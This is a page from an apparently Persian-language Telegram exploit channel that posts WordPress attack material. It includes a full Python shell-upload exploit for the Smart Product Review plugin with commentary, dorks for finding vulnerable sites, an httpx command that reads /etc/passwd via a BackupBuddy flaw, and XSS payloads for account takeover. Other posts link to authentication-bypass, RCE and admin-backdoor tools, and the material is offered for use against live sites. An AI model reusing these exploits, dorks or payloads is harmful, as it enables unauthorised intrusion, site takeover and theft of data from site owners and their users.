0Day.Today | Learn Exploit | Zero World | Dark web |
19.8K subscribers
1.25K photos
130 videos
489 files
1.29K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
#WP #vulnerabilities #Vuln #File_Upload #Wordpress

آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.4

جهت مشاهده ی دمو بزنید.

دورک و تحلیل اسکریپت تو پست بعدی


IR0Day.Today Boy's
@LearnExploit
@Tech_Army
#WP #vulnerabilities #Vuln #File_Upload #Wordpress

آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.


#Google~Dork:
inurl: /wp-content/plugins/smart-product-review/


#Download~Script:
Download

خب بریم ببینیم این اسکریپت چطوری کار میکنه :

خب داره اینجا لایبرری ها رو‌اضافه میکنه

import os.path
from os import path
import json
import requests
import time
import sys



نمایشی از خودش را انداخته اینجا :|
def banner():
animation = "|/-\\"
for i in range(20):
time.sleep(0.1)
sys.stdout.write("\r" + animation[i % len(animation)])
sys.stdout.flush()
#do something
print("Smart Product Review 1.0.4 - Arbitrary File Upload")
print("Republice By : IR0Day.Today Channel")

def usage():
print("Usage: python3 exploit.py [target url] [your shell]")
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")



خب اینجا داره فانکشینی مبنی بر چک کردن باگ تعریف میکنه
def vuln_check(uri):
response = requests.get(uri)
raw = response.text

if ("No script kiddies please!!" in raw):
return False;
else:
return True;


انجام امورات مهم :) اینجا صورت گرفته :
def main():

banner() # Banner ejra mishe
if(len(sys.argv) != 3): #Age toole vurudi kamtar az 3 ta bood
usage(); # ino nemayesh bede
sys.exit(1); # badesh kharej sho


base = sys.argv[1] #argoman 1 ke hamoon targete mesal : google.com
file_path = sys.argv[2] #argoman dovom (inm shelletone )

بعضی چیزارو واسه راحتی کار ریخته توی متغیر
ajax_action = 'sprw_file_upload_action'
admin = '/wp-admin/admin-ajax.php';


uri = base + admin + '?action=' + ajax_action ; #inja beham chasbunde
check = vuln_check(uri); # khob inja Chizaei ke chasbondaroo mifrestee be function check

بعده چک شدن حالا اگه False بود میزنه اسیب پذیر نیست و خارج میشه ولی اگه اسیب پذیر بود میزنن اسیب پذیره و خارج میشه 😐
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)

if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)




اینجا یه دیکشنری تعریف میکنه که تو متد request لازمه ( البته از نوع پست )

files = {'files[]' : open(file_path)}
data = {
"allowedExtensions[0]" : "jpg",
"allowedExtensions[1]" : "php4",
"allowedExtensions[2]" : "phtml",
"allowedExtensions[3]" : "png",
"qqfile" : "files",
"element_id" : "6837",
"sizeLimit" : "12000000",
"file_uploader_nonce" : "2b102311b7"
}


print("Uploading Shell...");
response = requests.post(uri, files=files, data=data )

تو خط بالایی داره دیتا هارو میفرسته



بعده ارسال query چک میکنه که فایل شله هست اونجا یا نه اگه بود میزنه حله دهنشو سرویس کن نبود میگه بعدی... و خارج میشه

file_name = path.basename(file_path)
if("ok" in response.text):
print("Shell Uploaded!")
print("Shell URL on your Review/Comment");
else:
print("Shell Upload Failed")
sys.exit(1)

main();

خب این بود کل قضیه 😐🙌 بابا خیلی جدی نگیرید اینارو


IR0Day.Today Boy's
@LearnExploit
@TechArmy
👍2
چندین آسیب پذیری از جمله CVE-2021-25049 و CVE-2021-24865 در پلاگین های Wordpress امکان حمله Xss , SQL Injection , Csrf و ... را برای مهاجم فراهم می کند .

پیشنهاد میشه یوزر ها سریعا اقدام به نصب پچ های امنیتی بکنند .

شناسه آسیب پذیری ها :

CVE-2021-25049
CVE-2021-25062
CVE-2021-25073
CVE-2021-24423
CVE-2021-24906
CVE-2021-25017
CVE-2021-24865
CVE-2021-24858

منبع : Wpscan

#Wpscan #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
Wordpress vuln , CVE

plugin: backupbuddy

cat hosts |httpx -title -path "/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd" -match-string "root:x:0:0"

#wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
👍31
Collection of Wordpress Exploits and CVES.

Github

#Wordpress #Exploit #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
2👎2
Wordpress - XSS ( CVE-2022-29455)

/wp-content/plugins/elementor/assets/js/frontend.min.js

usage:

https://target_site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==

#wordpress #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥10❤‍🔥1👍1
Exploiting the xmlrpc.php on all WordPress versions

Read Here

#Exploit #WordPress
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥4👍1
در نسخه جدید پلاگین ژاکت:
zhaket.com/web/wp-advanced-support-ticket
باگی وجود داره که میتونید از طریق این پلاگین خیلی ساده به پنل افراد دیگه دسترسی داشته باشید.
site.ir/my-account/tickets/?sss=t&ddd=1

پیلود تست شده :
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

پیلود تست شده :
https://site.ir/my-account/tickets/?action=view&ticket-id=22%3Cscript%3Ealert(1)%3C/script%3E

بجای عدد 1، ایدی عددی یوزر مورد نظرو بزنید. خودکار لاگین میشید.
site.ir/my-account/tickets/?sss=t&ddd=1

#XSS #WordPress
——————
0Day.Today
@LearnExploit
@Tech_Army
6👍31
wordpress login page allow un-auth cross site scripting (xss)

Payload :

%22%20accesskey%3dx%20onclick%3dalert(1)%2f%2f

#xss #wordpress
——————‌
0Day.Today
@LearnExploit
@Tech_Army
🔥14👎41👍1
WordPress Plugin WPML Version < 4.6.1 RXSS vulnerability

Nuclei template:
Github

Payload : https://xxxxxxx/wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(0)%0c

#Wordpress #0day #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👎4🔥3🤝1
CVE-2023-2982

WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) <= 7.6.4 - Authentication Bypass

Github

#bypass #wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
👍9👎3
#Exploit #Wordpress #JupiterX #Plugin
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln

Dork :
inurl: wp-content/plugins/jupiterx-core/

Shared By XP4

IR0Day.Today Bax
@LearnExploit
@Tech_Army
5👍2❤‍🔥1👏1😁1
CVE-2023-38389-@LearnExploit.rar
726.6 KB
#Exploit #Wordpress #JupiterX #Plugin
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln

Dork :
inurl: wp-content/plugins/jupiterx-core/

نکته: با پایتون 2.7 اجرا کنید در غیر این صورت با اررور مواجه میشید.

Shared By XP4

IR0Day.Today Bax
@LearnExploit
@Tech_Army
6👍51
CVE-2023-37988 - Wordpress/Plugin - Contact Form Generator [RXSS]

Github

#CVE #Wordpress #RXSS
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍3
بکدور ساخت یوزر ادمین با دسترسی دائم

Link File

#backdoor #wordpress

imem!

——————‌
0Day.Today
@LearnExploit
@Tech_Army
112🔥2
CVE-2023-6875 - Authorization Bypass vulnerability in POST SMTP Mailer, a WordPress plugin with over 300,000+ active installations

POC

Read

#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥311
PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks - 1.9.6 CVSS 9.8

Query Fofa: body="/wp-content/themes/bricks/"

POC

Nuclei

#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
8❤‍🔥3🔥3👍1
🚨 از یک چک‌باکس تا مدیرکل سایت — درس‌هایی از CVE‑2025‑32281

در ژوئن ۲۰۲۵، آسیب‌پذیری خطرناکی در افزونه WPKit for Elementor نسخه ≤ 1.1.0 کشف شد که به یک مهاجم اجازه می‌دهد بدون هیچ مجوزی (Missing Authorization) مقادیر حیاتی در تنظیمات وردپرس را به‌دلخواه تغییر دهد. این یعنی حتی بدون ورود به سیستم، امکان ارتقاء حساب کاربری عادی به مدیر کل (Privilege Escalation) وجود دارد.

🔰 برای پابلیک کردن اکسپلویت و اتواسکنر | ری اکشن ها مهمه :)
🔰For publishing exploits and Autoscanner | Reactions are important :)


~ X P 4
#wordpress #PrivilegeEscalation #learn_exploit
IR0Day.Today Bax
@LearnExploit
@IR0DayBax
@Hakfateam
4❤‍🔥2